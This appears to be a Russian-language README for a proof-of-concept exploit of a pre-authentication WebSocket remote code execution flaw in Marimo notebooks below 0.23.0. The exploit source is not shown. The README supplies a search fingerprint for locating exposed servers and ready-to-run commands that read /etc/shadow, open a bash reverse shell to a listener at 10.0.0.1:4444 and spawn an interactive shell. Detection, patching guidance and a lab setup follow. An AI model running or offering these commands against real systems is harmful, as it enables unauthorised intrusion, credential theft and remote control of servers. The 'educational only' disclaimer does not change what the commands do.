
PoC для CVE-2026-39987: RCE до аутентификации через WebSocket в Marimo версии ниже 0.23.0 (CVSS 9.3).
Этот скрипт предназначен ТОЛЬКО для образовательных целей и авторизованного тестирования. Несанкционированное использование этого инструмента против систем без явного разрешения НЕЗАКОННО. Автор не несет ответственности за неправомерное использование этой информации.
Версии Marimo до 0.23.0 содержат критическую уязвимость удаленного выполнения команд (RCE) без предварительной аутентификации. Конечная точка /terminal/ws не реализует надлежащие механизмы контроля доступа, что позволяет неаутентифицированному атакующему получить полную интерактивную оболочку в системе.
| Деталь | Информация |
|---|---|
| CVE | CVE-2026-39987 |
| Серьезность | КРИТИЧЕСКАЯ |
| CVSS Score | 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H) |
| Тип | Pre-Auth Remote Code Execution (RCE) |
| Вектор | WebSocket (/terminal/ws) |
| Затронутый продукт | Marimo < 0.23.0 |
| Патч | Marimo ≥ 0.23.0 |
http.favicon.hash:-1864630356
text
-1864630356/api/versionpip install websockets requests
Основное использование
bash
python CVE-2026-39987_PoC.py http://victima.com:8080 "id"
Примеры
bash
# Получение информации о системе
python CVE-2026-39987_PoC.py http://target.com:8080 "id"
python CVE-2026-39987_PoC.py http://target.com:8080 "uname -a"
python CVE-2026-39987_PoC.py http://target.com:8080 "whoami"
# Чтение конфиденциальных файлов
python CVE-2026-39987_PoC.py http://target.com:8080 "cat /etc/passwd"
python CVE-2026-39987_PoC.py http://target.com:8080 "cat /etc/shadow"
# Reverse shell
python CVE-2026-39987_PoC.py http://target.com:8080 "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
# Интерактивная оболочка
python CVE-2026-39987_PoC.py http://target.com:8080 "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
🛡️ Обнаружение (Безопасное)
Скрипт пассивного обнаружения
bash
python detector.py -u http://target.com:8080
python detector.py -l urls.txt
Nuclei Template
yaml
# marimo-cve-2026-39987.yaml
id: CVE-2026-39987
info:
name: Marimo < 0.23.0 Pre-Auth RCE
severity: critical
# ... (полный шаблон включен)
🔧 Устранение
Немедленное
ОТКЛЮЧИТЬ систему от сети, если она подвержена воздействию
Заблокировать доступ к порту, на котором работает Marimo
Проверить журналы на предмет подозрительной активности
Постоянное
bash
# Обновление до пропатченной версии
pip install --upgrade marimo>=0.23.0
# Проверка версии
marimo --version
# Настройка аутентификации при публичном доступе
# НИКОГДА не открывайте 'marimo edit' напрямую в интернет
Docker (Уязвимая среда)
bash
# Запуск уязвимой версии для тестирования
docker run -p 8080:8080 marimo-team/marimo:0.22.0
# Проверка уязвимости
python CVE-2026-39987_detector.py http://localhost:8080
# Эксплуатация
python CVE-2026-39987_PoC.py http://localhost:8080 "id"
GitHub Security Advisory
NVD Entry
Pull Request #9098
Marimo Documentation
👥 Авторы
Обнаружение: [Имя исследователя]
Разработка PoC: [Ваше имя]
Патч: Marimo Team
📜 Лицензия
Этот проект предназначен только для образовательных целей. Использование этого программного обеспечения осуществляется на ваш собственный риск.
⭐ Если этот README был вам полезен, рассмотрите возможность поставить звезду репозиторию.
⚠️ ПОМНИТЕ: С БОЛЬШОЙ СИЛОЙ ПРИХОДИТ БОЛЬШАЯ ОТВЕТСТВЕННОСТЬ